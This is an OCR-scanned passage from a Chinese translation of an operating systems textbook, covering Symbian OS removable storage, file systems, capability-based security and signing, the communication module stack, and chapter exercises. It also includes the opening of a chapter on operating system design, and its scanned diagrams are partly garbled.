系统 中 的 其 他 线程 这 一 事实 。 活 动 对 象 使 得 阻塞 1O 调 用 可 以 由 操作 系统 来 处 理 ， 而 不 是 进程 自身 。 活 
动 对 象 由 一 个 调度 器 进行 协调 并 且 在 一 个 单独 的 线程 中 执行 。 

当 活动 对 象 使 用 一 个 阻塞 WO 调用 时 ， 它 用 信号 通知 操作 系统 并 且 把 自身 挂 起 。 当 调用 完成 时 ， 操 
作 系统 唤醒 挂 起 的 进程 ， 该 进程 如 同 带 有 数据 返回 的 函数 一 样 继续 执行 。 区 别 只 是 对 于 活动 对 象 的 一 个 
观点 : 它 不 能 调用 一 个 函数 并 期 待 一 个 返回 值 ， 它 必 须 调用 一 个 特殊 的 函数 并 且 使 该 函数 设置 阻塞 VO， 
但 是 立刻 返回 。 操 作 系统 接管 等 待 过 程 。 


12.5.6 可 移动 存储 器 

可 移动 存储 器 带 给 操作 系统 设计 人 员 一 个 有 趣 的 两 难处 境 。 当 往 读 取 模 插 入 一 张 安全 数据 (Secure 
Digital, SD) 卡 时 ， 该 卡 就 同 其 他 设备 一 样 成 为 一 个 设备 。 它 需要 一 个 控制 器 、 一 个 驱动 、 一 种 总 线 结 
构 ， 而 且 很 有 可 能 通过 DMA 与 CPU 进行 通信 。 然 而 ， 对 这 类 模型 移 除 存储 介质 是 一 个 很 严重 的 问题 ， 
操作 系统 怎样 检测 插入 和 移 除 ? 这 一 模型 如 何 适 应 一 张 介质 卡 的 不 存在 ? 还 有 更 加 复杂 的 情况 ， 一 些 设 
备 档 能 够 兼容 不 止 一 种 类 型 的 设备 。 例 如 ， 一 张 SD 卡 ， 一 张 miniSD 卡 ( 带 有 适配器 )， 以 及 一 张 多 媒体 
卡 都 使 用 同一 类 插 档 。 

Symbian 操作 系统 使 用 可 移动 存储 器 的 很 多 共同 性 来 实现 对 它们 的 支持 。 每 种 可 移动 存储 器 通常 具 
有 如 下 特点 : 

1) 所 有 的 设备 必须 支持 插入 和 移 除 。 
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2) 所 有 的 可 移动 存储 器 能 够 “ 热 ” 拔 ， 也 就 是 正在 使 用 时 被 拔 下 。 

3) 每 种 介质 都 能 报告 它 自 己 的 容量 。 

4) 必须 拒绝 不 适 配 的 卡 。 

5) 每 种 卡 都 需要 电源 。 

为 了 支持 可 移动 存储 器 ，Symbian 操 作 系 统 提供 控制 每 种 支持 卡片 的 软件 控制 器 。 这 些 控制 器 和 设 
备 驱 动工 作 在 一 起 ， 这 在 软件 层面 上 也 是 一 样 的 。 当 一 张 卡 插 入 时 ， 就 创建 了 一 个 套 接 字 对 象 ， 该 套 接 
字 对 象 构成 数据 流动 过 程 中 的 通道 。 为 了 适应 卡 状态 的 改变 ，Symbian 操 作 系统 提供 了 一 系列 的 当 状 态 
改变 发 生 时 的 事件 。 设 备 驱 动 像 活动 对 象 一 样 被 配置 用 来 监听 这 些 事件 并 作出 反应 。 


12.6 存储 系统 
和 所 有 面向 用 户 的 操作 系统 一 样 ，Symbian 操 作 系统 有 一 个 文件 系统 。 下 面 我 们 来 对 其 进行 描述 。 


12.6.1 移动 设备 文件 系统 

就 文件 系统 和 存储 而 言 ， 手 机 操作 系统 有 很 多 和 台式 机 操作 系统 相同 的 需求 。 多 数 的 这 类 系统 都 实 
现在 32 位 硬件 平台 上 ， 允许 用 户 以 任意 的 名 字 命 名 文件 ， 大 量 存 储 文件 ， 需 要 一 定 的 组 织 结构 。 这 意味 
着 我 们 需要 一 个 分 层 的 、 基 于 目录 的 文件 系统 。 而 且 ， 手 机 操作 系统 设计 人 员 有 很 多 文件 系统 可 以 选择 
时 ， 一 个 很 重要 的 特性 影响 了 他 们 的 选择 : 大 多 数 手 机 存储 介质 可 以 和 Windows 环 境 共享 使 用 。 

如 果 手 机 系统 中 没有 可 移动 存储 器 件 ， 则 任 一 种 文件 系统 都 是 可 以 使 用 的 。 但 是 ， 对 于 使 用 闪存 作 
为 存储 的 系统 来 说 ， 还 有 特殊 的 情况 需要 考虑 。 存 储 块 一 般 都 是 512 字 节 到 2048 字 节 ， 但 闪存 不 能 直接 
修改 数据 记录 ， 而 需要 先 擦 除数 据 ， 然 后 才能 进行 写 入 。 另 外 ， 擦 除 的 操作 很 不 精确 ， 每 次 擦 除 不 能 只 
擦 除 一 个 字 必须 擦 除 整个 块 。 擦 除 速度 相对 比较 慢 。 

为 了 顺应 这 些 特征 ， 并 且 使 闪存 工作 效率 最 高 ， 需 要 文件 系统 能 够 把 写 操作 分 散 到 整个 器 件 ， 以 及 
解决 较 长 的 擦 除 时 间 问 题 。 一 个 基本 的 概念 是 ， 当 文件 被 更 新 时 ， 文 件 系统 会 将 文件 的 更 新 副本 写 人 空 
闲 的 存储 块 并 修改 文件 指针 ， 而 在 有 空闲 时 间 时 再 进行 昌 数 据 块 的 回收 操作 。 

最 早 的 闪存 文件 系统 之 一 是 微软 公司 在 20 世 纪 90 年 代 初 为 MS-DOS 使 用 的 FFS2 文 件 系统 。 在 1994 
年 PCMCIA 工 业 组 织 通过 了 关于 闪存 的 闪存 传输 层 (Flash Translation Layer) 标准 后 ， 闪 存 器 件 可 以 被 
识别 为 一 个 FAT 文 件 系 统 。Linux 同 时 也 专门 为 闪存 设计 了 JFFS (Journaling Flash File System) 和 
YAFFS (Yet Another Flash Filing System) 两 种 文件 系统 。 

但 是 ， 移 动 平台 必须 和 其 他 计算 机 共享 存储 介质 ， 这 就 要 求 必须 有 一 定 的 兼容 措施 。FAT 文 件 系统 
是 最 常用 到 的 。 而 且 ， 由 于 与 FAT-32 相 比 ，FAT-16 有 着 较 小 的 分 配 表 以 及 长 文件 的 简化 用 法 ， 所 以 FAT- 
16 的 使 用 更 为 广泛 。 


12.6.2 Symbian 操作 系统 文件 系统 

作为 智能 手机 操作 系统 ，Symban OS 至 少 需要 实现 FAT-16 文 件 系 统 。 实 际 上 ， 它 的 确 支持 FAT-16， 
并 在 大 多 数 存储 介质 上 使 用 。 

但 是 ，Symbian 操 作 系统 文件 服务 器 是 建立 在 一 个 类 似 Linux 的 虚拟 文件 系统 的 抽象 层 上 的 。 面 向 对 
象 技术 允许 多 种 文件 系统 的 实现 代码 作为 文件 服务 器 的 插件 使 用 ， 于 是 允许 同时 使 用 多 种 文件 系统 。 多 
种 文件 系统 的 实现 代码 可 以 在 一 个 文件 服务 器 中 共存 。 

Symbian 操 作 系 统 也 支持 NFS 和 SMB 文 件 系统 。 


12.6.3 文件 系统 安全 和 保护 

智能 手机 安全 是 通用 计算 机 安全 的 一 个 有 趣 的 变 体 。 有 很 多 侧面 特征 使 得 智能 手机 安全 更 富有 挑战 。 
Symbian 操 作 系 统 在 设计 选择 上 有 很 多 与 通用 计算 平台 和 其 他 智能 手机 平台 不 同 的 地 方 。 在 这 里 我 们 只 
关注 和 文件 系统 安全 有 关 的 特征 ， 其 他 方面 将 在 下 一 节 中 进行 讨论 。 

考虑 到 智能 手机 的 环境 ， 它 们 属于 单 用 户 设备 ， 不 需要 在 使 用 前 进行 用 户 认证 。 一 个 手机 用 户 可 以 
执行 应 用 程序 、 拨 打 电 话 、 访 问 网 络 ， 全 都 不 需要 用 户 认 证 。 在 这 样 的 环境 下 ， 使 用 基于 权限 的 安全 措 
施 是 很 有 挑战 性 的 ， 因 为 缺乏 认证 机 制 意味 着 只 有 一 组 权限 可 以 使 用 ， 即 所 有 人 使 用 同样 的 一 组 权限 。 

除了 权限 ， 安 全 经 常 受益 于 其 他 形式 的 信息 。 在 Symbian 操作 系统 版 本 9 或 更 新 的 版 本 中 ， 应 用 程 
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序 在 安装 时 就 已 被 指定 了 其 行为 能 力 ( 授 予 一 个 应 用 程序 权限 的 机 制 将 在 下 一 节 涉 及 )。 一 个 应 用 程序 
在 请 求 执行 某 项 行为 时 ， 其 行为 能 力 集 将 被 检查 。 如 果 这 种 访问 在 行为 能 力 集中 存在 ， 访 问 被 许可 ， 否 
则 被 拒绝 。 行 为 能 力 检查 会 造成 一 些 系统 开销 一 一 每 次 涉及 到 访问 资源 的 系统 调用 都 需要 进行 检查 一 一 
但 检查 一 个 文件 的 所 有 者 是 否 匹 配 的 开销 会 更 长 。 这 个 折 中 在 Symbian 操作 系统 中 效果 很 好 。 

Symbian 操作 系统 中 还 有 一 些 其 他 形式 的 文件 安全 。 在 Symbian 操作 系统 的 存储 器 件 中 有 特定 的 区 
域 ， 需 要 有 特定 权限 的 应 用 程序 才能 访问 。 这 种 特定 的 权限 只 将 安装 程序 赋予 了 应 用 程序 。 这 样 做 的 效 
果 是 ， 新 安装 的 应 用 程序 在 安装 完成 后 即 被 保护 ， 不 受 任何 非 系统 的 访问 (意味 着 非 系 统 的 恶意 程序 ， 
如 病毒 ， 不 能 感染 已 经 安装 的 程序 )。 另 外 ， 文 件 系统 预 留 了 专门 保存 应 用 程序 产生 的 特殊 数据 的 区 域 
(这 被 称 作 数 据 锁 定 ， 见 下 一 节 )。 

对 Symbian 操 作 系 统 来 说 ， 权 限 的 使 用 和 文件 所 有 者 在 保护 文件 访问 上 的 效果 是 相当 的 。 


12.7 Symbian 操作 系统 的 安全 

智能 手机 提供 的 环境 很 难保 证 安全 。 像 我 们 之 前 提 到 的 ， 它 们 属于 单 用 户 设备 ， 不 需要 在 使 用 基本 
功能 前 进行 用 户 认证 。 更 复杂 的 功能 (如 应 用 软件 安装 ) 需要 授权 ， 但 不 需 认 证 。 然 而 ， 智 能 手机 上 执 
行 的 复杂 操作 系统 中 ， 有 很 多 途径 进行 数据 的 交换 (以 及 执行 程序 ) 。 在 这 样 的 环境 进行 安全 防护 变 得 
很 复杂 。 

Symbian 操 作 系 统 很 好 地 体现 了 这 一 安全 难度 。 用 户 期 望 基于 Symbian 操 作 系统 的 智能 手机 允许 不 
经 认证 即 可 任意 使 用 一 一 没有 登录 和 身份 鉴别 。 但 是 ， 你 肯定 经 历 过 ， 一 个 和 Symbian 操作 系统 同样 复 
杂 的 操作 系统 很 容易 受到 病毒 、 蠕 虫 和 其 他 恶意 软件 的 影响 。 在 Symbian 操作 系统 版 本 9 以 前 的 版 本 中 ， 
操作 系统 提供 了 一 个 守门 人 式 的 安全 功能 : 系统 询问 用 户 是 否 允 许 安装 每 一 个 应 用 程序 。 这 种 设计 的 思 
维 是 ， 只 有 用 户 自己 安装 的 程序 会 造成 系统 毁坏 ， 一 个 被 告知 的 用 户 会 知道 他 所 要 安装 的 哪些 软件 是 恶 
意 软件 。 用 户 会 理智 地 使 用 它们 。 

守门 人 式 设计 有 很 多 优点 。 例 如 : -个 新 的 没有 用 户 自己 安装 的 应 用 程序 的 智能 手机 是 一 个 可 以 无 
故障 运行 的 系统 。 只 安装 用 户 认为 不 是 恶意 软件 的 程序 ， 即 可 保证 系统 的 安全 。 这 种 设计 的 问题 是 ， 用 
户 并 不 总 是 知道 安装 一 个 应 用 程序 的 全 部 后 果 。 存 在 伪装 成 有 用 的 应 用 程序 的 病毒 ， 在 提供 有 用 功能 的 
同时 静默 地 安装 恶意 代码 。 普 通用 户 无 法 验证 所 有 软件 的 可 信 度 。 

Symbian 操作 系统 版 本 9 的 信任 验证 机 制 提升 到 了 一 个 新 设计 的 平台 上 。 这 个 版 本 的 操作 系统 保留 
原 有 的 守门 人 式 机 制 ， 但 是 在 用 户 之 外 提供 了 对 安装 软件 进行 验证 的 机 制 。 每 个 软件 开发 者 现在 需要 负 
责 通过 数字 签名 技术 来 验证 一 个 软件 是 由 其 编写 的 。 不 是 所 有 的 软件 都 必须 有 这 样 的 验证 ， 只 有 需要 访 
问 特 定 系统 资源 的 软件 需要 。 当 一 个 应 用 软件 需要 数字 签名 时 ， 需 要 如 下 几 个 步骤 : 

1) 软件 开发 者 需要 从 可 信 的 第 三 方 获得 一 个 厂商 ID ， 这 些 可 信 的 第 三 方 由 Symbian 来 进行 鉴定 。 

2) 当 一 个 开发 者 开发 了 一 个 程序 包 并 希望 发 布 时 ， 他 必须 将 其 提交 到 可 信 的 第 三 方 进行 验证 。 开 发 
者 提交 其 厂商 ID、 应 用 程序 以 及 该 应 用 程序 访问 系统 的 方式 列表 。 

3) 可 信 第 三 方 验证 所 提供 的 访问 类 型 列表 是 完全 的 ， 而 且 没 有 其 他 类 型 的 访问 发 生 。 如 果 该 可 信 第 
三 方 可 以 进行 此 验证 ， 该 软件 即 由 可 信 第 三 方 进行 签名 。 这 意味 着 安装 包 中 会 包含 一 些 特殊 的 信息 ， 详 
细 地 描述 该 软件 会 对 Symbian 操作 系统 做 出 什么 操作 。 

4) 该 安装 包 被 送 回 到 软件 开发 人 员 处 ， 并 可 以 发 放 给 用 户 。 需 要 注意 的 是 ， 这 个 方法 依赖 于 应 用 程 
序 如 何 访问 系统 资源 。 在 Symbian 操作 系统 中 ， 应 用 程序 必须 拥有 访问 一 个 资源 的 能 力 ， 才 会 允许 使 用 
相应 的 资源 。 这 种 行为 能 力 的 机 制 建立 在 Symbian 操作 系统 的 内 核 中 。 当 一 个 进程 被 创建 时 ， 该 进程 的 
进程 控制 块 的 一 部 分 用 来 记录 该 进程 被 授予 的 权限 。 当 进程 试图 使 用 它 不 能 使 用 的 权限 时 ， 该 访问 将 被 
内 核 阻止 

这 个 看 起 来 复杂 的 机 制 使 得 我 们 可 以 在 Symbian 操作 系统 中 建立 一 个 自动 的 守门 人 起 机 制 ， 来 验证 
要 安装 的 软件 。 安 装 过 程 检查 安装 包 中 的 标识 。 如 果 该 标识 是 有 效 的 ， 该 应 用 程序 被 授予 的 权限 将 记录 
来， 同时 可 以 在 执行 时 通过 内 核 的 检查 。 

图 12-3 中 的 图 描述 了 Symbian 操作 系统 版 本 9 中 的 信任 关系 。 需 要 注意 的 是 ， 系 统 中 内 置 了 多 个 信任 
等 级 。 有 些 应 用 软件 不 访问 任何 系统 资源 ， 故 而 也 不 需要 签名 。 一 个 例子 是 只 在 屏幕 上 显示 内 容 的 简单 
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应 用 。 这 些 应 用 软件 不 被 也 不 需 被 信任 。 下 一 个 信任 级 别 是 用 户 级 签名 应 用 程序 级 。 这 些 应 用 程序 只 被 
授予 其 需要 的 权限 。 第 三 个 信任 等 级 由 系统 服务 组 成 。 同 用 户 级 应 用 程序 一 样 ， 这 些 服务 只 需要 特定 的 
权限 以 便 完成 其 任务 。 在 一 个 如 同 Symbian 操作 系统 的 微 内 核 体系 结构 中 ， 这 些 服 务 运行 在 用 户 态 ， 并 
像 用 户 程序 一 样 被 信任 。 最 后 ， 有 一 类 程序 需要 系统 的 完全 信任 。 这 组 程序 拥有 修改 整个 系统 的 能 力 ， 
并 由 内 核 代码 组 成 。 

可 信 计 算 环境 : 可 信 计 算 基 础 : 


系统 服务 以 不 同 的 权限 运行 具有 全 部 权限 修改 文件 系统 ， 
包括 内 核 、F32、SWInstall 


消息 传递 @ 
MMF) JHE SWInstall 是 
| atei < 守门 人 式 机 
Й 4 制 的 执行 者 
seock Wiserv 
已 签名 应 用 程序 : 
按照 其 声明 的 意图 进行 签名 未 签名 应 用 程序 
的 低 信任 等 级 软件 不 影响 系统 环境 和 文件 系统 
的 不 可 信 应 用 程序 


图 12-3 Symbian 操作 系统 通过 信任 关系 来 保证 安全 
在 这 个 系统 中 有 若干 个 方面 看 起 来 值得 质疑 。 例 如 ， 这 样 复杂 的 机 制 真 的 有 必要 吗 (尤其 是 需要 花 
费 金 钱 来 制作 的 情况 下 ) ? 结论 是 肯定 的 : Symbian 签名 系统 代替 用 户 来 对 软件 进行 完整 性 验证 ， 并 且 
该 验证 必须 被 执行 。 这 一 机 制 看 起 来 可 能 会 带 来 开发 上 的 难度 。 是 否 每 次 在 真实 物理 设备 上 进行 测试 都 
需要 一 个 新 的 签名 的 安装 包 ? 为 了 解决 这 个 问题 ，Symbian 操 作 系 统 识 别 开 发 人 员 的 特殊 签名 。 一 个 开 
发 人 员 必须 获得 一 个 有 时 效 限 制 (通常 是 6 个 月 ) 的 证 书 和 一 个 特殊 的 智能 手机 ， 即 可 使 用 自己 的 数字 
证 书 来 创建 安装 包 。 
除了 这 样 的 守门 人 式 机 制 外 ，Symbian 操 作 系统 版 本 9 同时 采用 数据 锁定 (Data Caging) 技术 ,来 
组 织 特定 目录 下 的 数据 。 比 如 ， 可 执行 代码 只 存在 一 个 目录 中 ,而 该 目录 只 对 软件 安装 程序 可 写 。 另 外 ， 
应 用 程序 只 能 在 一 个 目录 中 进行 写 操作 ， 它 们 各 自 的 数据 不 能 被 其 他 程序 访问 。 


12.8 Symbian 操作 系统 中 的 通信 

Symbian 操作 系统 按照 特殊 的 标准 设计 ， 并 使 用 客户 机 /服务 器 机 制 和 基于 栈 的 配置 ， 以 事件 驱动 型 
的 通信 为 特色 。 
12.8.1 基本 基础 结构 

Symbian 操作 系统 的 通信 系统 基础 结构 建立 在 基本 构件 之 上 。 考 虑 如 图 12-4 中 所 示 的 一 个 非常 通用 
的 模式 。 考 虑 把 这 个 图 作为 一 个 可 组 织 模型 的 起 点 。 在 这 个 栈 的 底层 是 物理 设备 ， 以 一 定 方式 链接 到 计 
算 机 。 这 个 设备 可 以 是 集成 在 通信 设备 中 的 手机 调制 解 调 器 或 是 一 个 蓝牙 无 线 电 装置 。 在 此 ， 我 们 不 关 
心底 层 的 硬件 实现 ， 而 是 把 这 个 物理 设备 当做 一 个 会 以 合适 的 方式 响应 软件 发 出 的 命令 的 抽象 设备 。 

下 一 层 ， 即 我 们 需要 关心 的 第 一 层 ， 是 设备 驱动 请。 我 们 已 经 指出 了 设备 驱动 的 结构 ， 这 一 层 的 软 
件 直 接 通过 LDD 和 PDD 结 构 与 硬件 配合 工作 。 这 一 层 的 软件 是 硬件 相关 的 ， 每 个 新 型 号 的 硬件 设备 都 需 
要 一 个 软件 的 设备 驱动 为 其 衔接 。 不 同 的 硬件 需要 不 同 的 设备 驱动 ， 但 它们 都 为 上 层 提供 同样 的 接口 。 
协议 层 期 望 无 论 什么 样 的 硬件 都 具有 相同 的 接口 。 

下 一 层 就 是 协议 实现 层 ， 包 含 了 Symbian 操 作 系统 所 支持 的 各 种 协议 的 实现 。 这 些 实现 承担 了 下 层 
的 设备 驱动 接口 ， 并 向 上 面 的 应 用 层 提供 了 一 个 单一 、 统 一 的 接口 。 这 就 是 提供 诸如 蓝牙 和 TCP/IP 协 议 
的 各 种 协议 的 部 分 。 
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最 后 ， 应 用 程序 层 是 最 高 的 一 层 。 该 层 包 含 了 需要 利用 通信 基础 结构 的 应 用 程序 。 应 用 程序 不 清楚 
通信 是 怎样 实现 的 ， 但 是 ， 该 应 用 程序 需要 通知 操作 系统 它 需 要 使 用 哪个 具体 设备 。 一 旦 设备 就 位 ， 应 
用 程序 不 直接 访问 设备 ， 而 是 依赖 协议 实现 层 的 API 来 驱动 真实 硬件 。 

12.8.2 更 仔细 地 观察 基础 结构 

Symbian 操作 系统 的 一 个 更 详细 的 结构 如 图 12-5 所 示 。 这 个 图 基于 图 12-4 的 通用 结构 ， 原 图 中 的 层 

被 细 分 为 Symbian 操作 系统 中 使 用 的 可 操作 单元 。 


模块 (жеи) | 


| 应 用 程序 层 
和 一 软 | 
[ # а 
| 协议 实现 层 ГЕЗ 
і [ р Ў | | 

ү озы EN WAEZB 
| зажав | 
| 设备 驱动 程序 层 | Г 逻辑 设备 驱动 程序 | 
| Не |[ 物理 设备 驱动 程序 

Я | # ЕЯ 

| 


图 12-5 Symbian 操作 系统 中 的 通信 


图 12-4 Symbian 操作 系统 中 面向 块 的 通信 结构 
设施 具有 一 组 丰富 的 功能 


1. 物理 设备 

首先 需要 注意 的 是 ， 物 理 设备 层 没有 变化 。 如 我 们 之 前 所 述 ，Symbian 操 作 系统 并 不 直接 控制 硬件 。 
所 以 ， 它 兼容 所 有 符合 该 层 的 API 设 计 的 硬件 ， 但 不 需 指定 硬件 本 身 是 如 何 设计 和 建造 的 。 这 一 点 对 
Symbian 操作 系统 和 其 开发 人 员 都 有 益处 。 通 过 将 硬件 看 作 抽象 结构 并 通过 这 一 抽象 进行 通信 ，Symbian 
操作 系统 的 设计 人 员 保 证 了 Symbian 操作 系统 可 以 广泛 地 兼容 现 有 设备 ， 同 时 适应 未 来 的 硬件 。 

2. 设备 驱动 层 

如 图 12-5 所 示 ， 设 备 驱 动 层 被 分 为 两 屋 。 如 我 们 之 前 所 述 ，PPD 层 通过 硬件 端口 直接 与 硬件 设备 进 
行 交 互 。 而 LDD 层 与 协议 实现 层 交互 ， 实 现 了 Symbian 操作 系统 中 与 硬件 相关 的 策略 。 这 些 策略 包括 输 
入 输出 缓冲 、 中 断 机 制 和 流 控制 。 

3. 协议 实现 层 

在 图 12-5 中 ， 协 议 实现 层 分 为 了 若干 子 层 。 在 协议 实现 层 中 使 用 了 四 种 模块 ， 列 举 在 下 面 ， 

OSY: 协议 实现 层 最 底层 是 通信 服务 ， 即 CSY 模 块 。 一 个 CSY 模 块 直接 通过 设备 驱动 程序 的 

PDD 部 分 与 硬件 通信 ， 实 现 了 协议 的 许多 底层 特征 。 例 如 ， 一 个 协议 可 能 需要 向 硬件 设备 传递 原 

始 数 据 ， 或 者 需要 在 传输 过 程 中 使 用 7 位 或 8 位 的 缓存 。 这 些 工作 模式 会 被 CSY 模 块 处 理 。 

“TSY 模 块 ， 电 话 中 包含 了 很 大 一 部 分 通信 基础 结构 ， 这 些 功能 需要 由 特殊 的 模块 来 进行 实现 。 电 

话 服务 (TSY) 模块 实现 了 这 些 功能 。 基 本 的 TSY 可 能 在 很 多 的 硬件 上 支持 标准 的 TSY， 例 如 拨 

打 和 切断 电话 。 更 高 级 的 TSY 模 块 可 以 支持 更 高 级 的 硬件 ， 比 如 支持 GSM 功 能 。 

+ PRT 模块 :协议 实现 层 的 核心 模块 是 协议 模块 《PRT 模块 )。 该 模块 由 服务 器 用 来 实现 具体 的 协议 。 

一 个 服务 器 在 试图 使 用 协议 的 时 候 创建 一 个 PRT 模 块 的 实例 。 例 如 ，TCPIP.PRT 模 块 中 实现 了 

TCRPIP 相 关 的 协议 。 蓝 牙 协议 在 BT.PRT 模 块 中 实现 。 

"МТМ. 由 于 Symbian 操作 系统 被 设计 用 来 处 理 短信 息 ， 设 计 人 员 专门 为 处 理 的 所 有 类 型 的 短信 息 
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建立 了 相应 的 机 制 ， 而 这 些 专门 的 模块 称 为 信息 类 型 模块 (MTM 模 块 )。 短 信息 处 理 包括 多 个 方 

面 ，MTM 模 块 需要 处 理 所 有 这 些 需求 。 用 户 界 面 类 MTM 模 块 需要 实现 多 种 供用 户 查 看 和 处 理 短 

信息 的 方式 ， 包 括 如 何 阅读 短信 息 ， 如 何 被 告知 短信 息 发 送 进度 等 。 客 户 端 MTM 模 块 处 理 寻 址 、 

创建 、 回 复 短信 息 ， 而 服务 器 端 MTM 模 块 需要 实现 面向 服务 器 的 相关 短信 息 管理 功能 ， 如 目录 管 

理 、 特 定 信息 的 管理 等 。 

根据 所 使 用 通信 类 型 的 不 同 ， 这 些 模块 以 不 同 的 方式 彼此 依赖 。 例 如 ， 实 现 使 用 蓝牙 的 协议 ， 我 们 
只 需要 物理 器 件 上 层 的 PRT 模 块 即 可 。 某 些 IrDA 协 议 也 是 如 此 。 而 基于 PPP 的 TCP/IP 实 现 则 需要 使 用 
PRT 模 块 、TSY 模 块 和 CSY 模 块 ， 不 基于 PPP 的 TCP/IP 协 议 则 不 需要 TSY 模 块 和 CSY 模 块 ， 但 是 其 PRT 横 
块 需要 直接 连接 到 网 络 设备 驱动 上 。 

4. 结构 模块 化 

基于 模块 化 的 思想 在 这 样 一 个 栈 式 的 模型 实现 中 是 很 有 用 的 。 在 这 个 分 层 的 设计 中 ， 从 例子 中 可 以 
看 出 ， 抽 象 带 来 的 优势 是 很 明显 的 。 考 虑 TCP/IP 协 议 的 实现 。 一 个 PPP 连 接 既 可 以 直接 使 用 CSY 模 块 ， 
也 可 以 选择 GSM 或 普通 调制 解 调 器 的 TSY 实 现 ， 后 者 实际 底层 仍 由 CSY 模 块 来 实现 。 未 来 新 的 电话 技术 
出 现 后 ， 当 前 的 结构 仍然 可 以 起 作用 ， 我 们 只 需要 为 新 的 电话 实现 添加 一 个 TSY 模 块 。 另 外 ， 细 调 
TCP/IP 协 议 栈 不 需要 修改 任何 其 依赖 的 模块 ， 只 需要 简单 地 调整 TCP/IP PRT 模 块 。 这 样 广泛 的 模块 化 意 
味 着 在 已 有 结构 上 很 容易 添加 新 代码 、 丢 弃 旧 代码 ， 当 前 代码 的 修改 不 会 对 整个 系统 带 来 巨大 的 变化 ， 
也 不 需要 大 量 的 重新 安装 。 

最 后 ， 图 12-5 在 应 用 层 添加 了 子 层 。 应 用 程序 通过 CSY 模 块 和 协议 实现 层 中 的 协议 模块 进行 交互 。 
虽然 我 们 可 以 认为 这 些 模块 属于 协议 实现 层 的 一 部 分 ， 但 更 清晰 的 表示 是 ， 这 些 模块 在 协助 应 用 程序 进 
行 操作 。 例 如 ， 在 使 用 红外 接口 将 短信 息 发 送 到 手机 的 过 程 中 ， 应 用 程序 会 在 应 用 程序 中 使 用 IRCOMM 
CSY 模 块 ， 通 过 协议 实现 层 的 短信 息 实现 模块 来 完成 。 同 样 ， 在 这 样 一 个 过 程 中 ， 模 块 化 带 来 了 很 大 的 
优势 ， 应 用 程序 可 以 关注 实现 其 擅长 的 功能 ， 而 不 是 通信 过 程 。 

12.9 小 结 

Symbian 操作 系统 是 一 个 为 智能 手机 平台 设计 的 面向 对 象 的 操作 系统 。 它 的 微 内 核 设 计 只 提供 了 很 
小 的 纳 核 ， 只 实现 了 最 快 和 最 简单 的 内 核 功能 。Symbian 操 作 系统 通过 客户 机 /服务 器 的 体系 结构 ， 将 对 
系统 资源 的 访问 分 配给 用 户 态 的 服务 器 。Symbian 操 作 系统 虽然 是 为 智能 手机 设计 的 ， 但 其 也 拥有 很 多 
通用 操作 系统 的 特性 : 进程 和 线程 、 内 存 管理 、 文 件 系统 支持 、 丰 富 的 通信 支持 。 同 时 ，Symbian 操 作 
系统 也 实现 了 一 些 独特 的 特性 ， 比 如 ， 活 动 对 象 使 等 待 外 部 事件 更 为 迅速 、 没 有 虚拟 内 存 使 得 内 存 管理 
更 富有 挑战 性 、 支 持 面向 对 象 的 设备 驱动 程序 采用 双 层 抽象 结构 。 “ 


习题 


.对 下 列 的 每 一 个 服务 ， 描 述 其 在 如 Symbian 操作 
系统 这 样 的 微 内 核 操作 系统 中 ， 是 在 用 户 态 还 
是 内 核 态 执行 。 

“调度 线程 的 执行 。 

“打印 一 个 文档 。 

"应 答 蓝牙 搜索 信号 。 

+ 管理 线程 对 屏幕 的 访问 。 

* 在 短信 息 到 达 时 发 出 声音 。 

“中 断 当 前 执行 并 接听 电话 。 

列举 微 内 核 设计 带 来 的 三 个 效率 提升 。 

列举 微 内 核 设 计 带 来 的 三 个 效率 问题 。 
-Symbian 操作 系统 将 其 内 核 分 割 为 纳 核 和 Sym- 
bian 内 核 两 部 分 。 如 动态 内 存 管理 之 类 的 服务 
被 认为 过 于 复杂 而 不 能 进入 纳 核 。 描 述 动态 内 


эю 


存 管理 中 的 复杂 模块 ， 解 释 为 什么 不 能 将 其 放 
进 微 内 核 。 

5. 我 们 讨论 过 ， 活 动 对 象 使 得 LO 操作 更 有 效率 。 
你 认为 应 用 程序 是 否 能 够 同时 使 用 多 个 活动 对 
象 ? 系统 在 多 个 I/0 事 件 发 生 时 会 如 何 响应 ? 

6. Symbian 操作 系统 中 的 安全 是 否 关 注 软件 安装 和 
应 用 程序 的 Symbian 签名 ? 这 是 否 足够 安全 ? 是 
否 会 有 某 个 场景 ， 应 用 程序 可 以 不 必 安 装 即 被 
运行 ? (提示 ; 考虑 手机 数据 输入 的 所 有 可 能 
方式 ) 

7. 在 Symbian 操 作 系统 中 ， 广 泛 应 用 了 基干 服务 的 
对 共享 资源 的 保护 。 列 举 三 种 在 微 内 核 环境 下 ， 
这 种 方式 协调 资源 的 优势 。 思 考 这 些 优势 对 不 
同体 系 结构 的 影响 。 
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在 过 去 的 12 章 中 ， 我 们 讨论 了 许多 话题 并 且 分 析 了 许多 与 操作 系统 相关 的 概念 和 实例 。 但 是 研究 现 
有 的 操作 系统 不 同 于 设计 一 个 新 的 操作 系统 。 在 本 章 中 ， 我 们 将 简 述 操作 系统 设计 人 员 在 设计 与 实现 一 
个 新 系统 时 必须 要 考虑 的 某 些 问题 和 权衡 。 

在 系统 设计 方面 ， 关 于 什么 是 好 ， 什 么 是 坏 ， 存 在 着 一 定数 量 的 民间 传说 在 操作 系统 界 流传 ， 但 是 
令 人 吃惊 的 是 这 些 民间 传说 很 少 被 记录 下 来 。 最 重要 的 一 本 书 可 能 是 Fred Brooks 的 经 典 著作 The 
Mythical Мап Month (中 文 译名 《人 月 神话 》)。 在 这 本 书 中 ， 作 者 讲述 了 他 在 设计 与 实现 IBM OS/360 系 
统 时 的 经 历 。 该 书 的 20 周 年 纪念 版 修订 了 某 些 素材 并 且 新 增加 了 4 章 (Brooks, 1995). 

有 关 操 作 系统 设计 的 三 篇 经 典 论文 是 “Hints бог Computer System Design” (计算 机 系统 设计 的 忠告 ， 
Lampson, 1984), “On Building Systems that Will Fail”( 论 建造 将 要 失败 的 系统 ，Corbat6, 1991) 和 
“End-to-End Arguments in System Design”( 系 统 设计 中 端 到 端的 论据 ，Saltzer 等 人 ，1984)。 与 Brooks 
的 著作 一 样 ， 这 三 篇 论文 都 极其 出 色 地 经 历 了 岁月 的 考验 ， 其 中 的 大 多 数 真知 灼 见 在 今天 仍然 像 文章 首 
次 发 表 时 一 样 有 效 。 

本 章 吸收 了 这 些 资料 来 源 ， 另 外 加 上 了 作者 作为 三 个 系统 的 设计 者 或 合作 设计 者 的 个 人 经 历 ， 这 三 
个 系统 是 : Amoeba (Tanenbaum 等 人 ，1990)、MINIX (Tanenbaum 和 Woodhull, 1997) 和 Globe (Van 
